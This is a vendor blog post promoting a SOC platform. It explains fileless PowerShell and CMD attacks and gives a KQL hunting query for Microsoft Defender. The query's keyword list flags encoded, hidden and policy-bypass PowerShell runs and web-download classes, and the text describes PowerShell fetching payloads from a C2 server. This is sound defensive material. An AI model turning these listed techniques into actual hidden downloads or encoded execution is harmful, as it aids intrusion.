Today's cyberattacks no longer resemble the viruses of the 2000s. Professional attackers, including ransomware affiliates, know that dropping a malicious executable file (.exe) on a hard drive will immediately trigger the antivirus. Their new weapon of choice? THE“Living off the Land” (LotL)or “Fileless” attacks.
Instead of bringing their own tools, hackers use legitimate programs already on Windows, such asPowerShellor Command Prompt (CMD), to execute malicious code directly in the computer's RAM. To find them, SOC analysts must examine the KQL tableDeviceProcessEventsin Microsoft Defender.
What is the DeviceProcessEvents table?
In the Microsoft 365 Defender (Advanced Hunting) data model, the tableDeviceProcessEventsacts as the "diary" of the operating system. It records each time a process starts on a protected machine.
It provides invaluable metadata such as:
- The process name (
FileName). - The exact command line executed (
ProcessCommandLine). - The user account that initiated the action (
AccountName). - The parent process that generated this action (
InitiatingProcessFileName).
Suspicious techniques to track down in KQL
To identify a fileless attack, the analyst must look for anomalous behaviors related to legitimate utilities. Here are the most common weak signals:
1. Obfuscation (Base64)
A system administrator uses PowerShell to automate tasks with clear scripts. An attacker will seek to hide his code by encoding it in Base64. The parameter-EncodedCommand(or its shortcuts-e,-enc) is a strong indicator.
2. Stealth downloading
PowerShell is often used as a "Dropper" to retrieve the ransomware payload from an external command and control (C2) server, using classes likeNet.WebClientOrInvoke-WebRequest.
3. Silent execution
To avoid alerting the user about the compromised machine, hackers launch background processes using settings-WindowStyle HiddenOr-NonInteractive.
The KQL Template: How to automate hunting
Writing the perfect query to identify these behaviors requires in-depth KQL expertise. Here is an example query that threat hunters use to isolate these processes:
DeviceProcessEvents
| where Timestamp > ago(7d)
| where FileName in~ ("powershell.exe", "cmd.exe")
| where ProcessCommandLine has_any("hidden", "encodedcommand", "enc", "bypass", "invoke-webrequest", "net.webclient")
| project Timestamp, DeviceName, AccountName, FileName, ProcessCommandLine, InitiatingProcessFileName
| sort by Timestamp descThe integrated approach with Akuity SOC
For an MSSP or internal SOC, asking a Level 1 analyst to memorize and type this type of query each time they take up a position is an operational risk.
It is for this reason that the platformAkuity SOCintegratesQuick Query Templates.
In the Threat Hunting Multi-Tenant console, a single click on the “Suspicious Processes” button automatically loads the optimized KQL query for trackingpowershell.exeAndcmd.exein the emerald green input box.
The analyst just needs to select the target customer tenant and run the query. The results (time, machine, and especially the suspicious command line) are instantly displayed in the asynchronous results grid of the interface.
What to do in the event of a positive discovery?
If the KQL query returns a PowerShell execution containing unexplained Base64 initiated by a Word document (ex:winword.exeas a parent process), there is no longer any doubt: you are facing a compromise in progress.
The analyst can then switch to the Akuity SOC remediation tab to trigger a "Network Isolation" (via Intune) of the compromised machine with one click, cutting off the attacker's access before they can finalize their attack.
Accelerate your proactive investigation.> Use our pre-integrated KQL templates in ourMulti-Tenant Threat Hunting Consoleto track Fileless malware on a large scale.